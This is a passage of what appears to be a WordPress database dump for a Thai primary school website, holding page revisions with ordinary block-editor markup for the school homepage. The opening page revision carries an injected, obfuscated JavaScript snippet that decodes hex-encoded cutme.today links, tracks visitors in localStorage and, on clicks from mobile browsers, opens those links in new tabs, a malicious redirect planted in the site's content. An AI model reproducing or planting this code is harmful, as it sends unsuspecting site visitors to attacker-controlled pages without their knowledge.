_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 11:59:58','2024-08-27 04:59:58','',19,'http://watprato.ssk.in.th/?p=225',0,'revision','',0),
(226,2,'2024-08-27 12:01:01','2024-08-27 05:01:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 